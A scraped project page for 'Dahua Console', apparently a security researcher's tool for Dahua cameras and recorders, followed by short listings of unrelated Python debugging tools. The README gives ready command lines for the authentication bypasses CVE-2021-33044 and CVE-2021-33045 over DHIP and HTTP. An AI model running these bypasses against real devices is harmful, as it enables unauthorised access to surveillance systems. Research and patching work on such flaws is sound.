Dahua Console, access internal debug console and/or other researched functions in Dahua devices.

Related tags

Debugging Toolsdahua
Overview

Dahua Console

  • Version: Pre-alpha
  • Bugs: Indeed
  • TODO: Lots of stuff

[Install requirements]

sudo pip3 install -r requirements.txt

[Arguments]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://
   
    :
    
     @
     
      :
      
       
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Release]

[Update]

2021-10-07

Details here: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocol needed: DHIP or HTTP/HTTPS (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocol needed: DHIP (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80
Owner
bashis
nobody
bashis
GitHub Repository
An x86 old-debug-like program.

An x86 old-debug-like program.

Pablo Niklas 1 Jan 10, 2022
Inject code into running Python processes

pyrasite Tools for injecting arbitrary code into running Python processes. homepage: http://pyrasite.com documentation: http://pyrasite.rtfd.org downl

Luke Macken 2.7k Jan 08, 2023
A drop-in replacement for Django's runserver.

About A drop in replacement for Django's built-in runserver command. Features include: An extendable interface for handling things such as real-time l

David Cramer 1.3k Dec 15, 2022
Sentry is cross-platform application monitoring, with a focus on error reporting.

Users and logs provide clues. Sentry provides answers. What's Sentry? Sentry is a service that helps you monitor and fix crashes in realtime. The serv

Sentry 32.9k Dec 31, 2022
Voltron is an extensible debugger UI toolkit written in Python.

Voltron is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB an

snare 5.9k Dec 30, 2022
🍦 Never use print() to debug again.

IceCream -- Never use print() to debug again Do you ever use print() or log() to debug your code? Of course you do. IceCream, or ic for short, makes p

Ansgar Grunseid 6.5k Jan 07, 2023
Middleware that Prints the number of DB queries to the runserver console.

Django Querycount Inspired by this post by David Szotten, this project gives you a middleware that prints DB query counts in Django's runserver consol

Brad Montgomery 332 Dec 23, 2022
pdb++, a drop-in replacement for pdb (the Python debugger)

pdb++, a drop-in replacement for pdb What is it? This module is an extension of the pdb module of the standard library. It is meant to be fully compat

1k Dec 24, 2022
An improbable web debugger through WebSockets

wdb - Web Debugger Description wdb is a full featured web debugger based on a client-server architecture. The wdb server which is responsible of manag

Kozea 1.6k Dec 09, 2022
Automated bug/error reporting for napari

napari-error-monitor Want to help out napari? Install this plugin! This plugin will automatically send error reports to napari (via sentry.io) wheneve

Talley Lambert 2 Sep 15, 2022
EDB 以太坊单合约交易调试工具

EDB 以太坊单合约交易调试工具 Idea 在刷题的时候遇到一类JOP(Jump-Oriented-Programming)的题目,fuzz或者调试这类题目缺少简单易用的工具,由此开发了一个简单的调试工具EDB(The Ethereum Debugger),利用debug_traceTransact

16 May 21, 2022
A gdb-like Python3 Debugger in the Trepan family

Abstract Features More Exact location information Debugging Python bytecode (no source available) Source-code Syntax Colorization Command Completion T

R. Bernstein 126 Nov 24, 2022
Django package to log request values such as device, IP address, user CPU time, system CPU time, No of queries, SQL time, no of cache calls, missing, setting data cache calls for a particular URL with a basic UI.

django-web-profiler's documentation: Introduction: django-web-profiler is a django profiling tool which logs, stores debug toolbar statistics and also

MicroPyramid 77 Oct 29, 2022
Code2flow generates call graphs for dynamic programming language. Code2flow supports Python, Javascript, Ruby, and PHP.

Code2flow generates call graphs for dynamic programming language. Code2flow supports Python, Javascript, Ruby, and PHP.

Scott Rogowski 3k Jan 01, 2023
Monitor Memory usage of Python code

Memory Profiler This is a python module for monitoring memory consumption of a process as well as line-by-line analysis of memory consumption for pyth

Fabian Pedregosa 80 Nov 18, 2022
VizTracer is a low-overhead logging/debugging/profiling tool that can trace and visualize your python code execution.

VizTracer is a low-overhead logging/debugging/profiling tool that can trace and visualize your python code execution.

2.8k Jan 08, 2023
Full-screen console debugger for Python

PuDB: a console-based visual debugger for Python Its goal is to provide all the niceties of modern GUI-based debuggers in a more lightweight and keybo

Andreas Klöckner 2.6k Jan 01, 2023
printstack is a Python package that adds stack trace links to the builtin print function, so that editors such as PyCharm can link you to the source of the print call.

printstack is a Python package that adds stack trace links to the builtin print function, so that editors such as PyCharm can link to the source of the print call.

101 Aug 26, 2022
Pyinstrument - a Python profiler. A profiler is a tool to help you optimize your code - make it faster.

Pyinstrument🚴 Call stack profiler for Python. Shows you why your code is slow!

Joe Rickerby 5k Jan 08, 2023
Sampling profiler for Python programs

py-spy: Sampling profiler for Python programs py-spy is a sampling profiler for Python programs. It lets you visualize what your Python program is spe

Ben Frederickson 9.5k Jan 08, 2023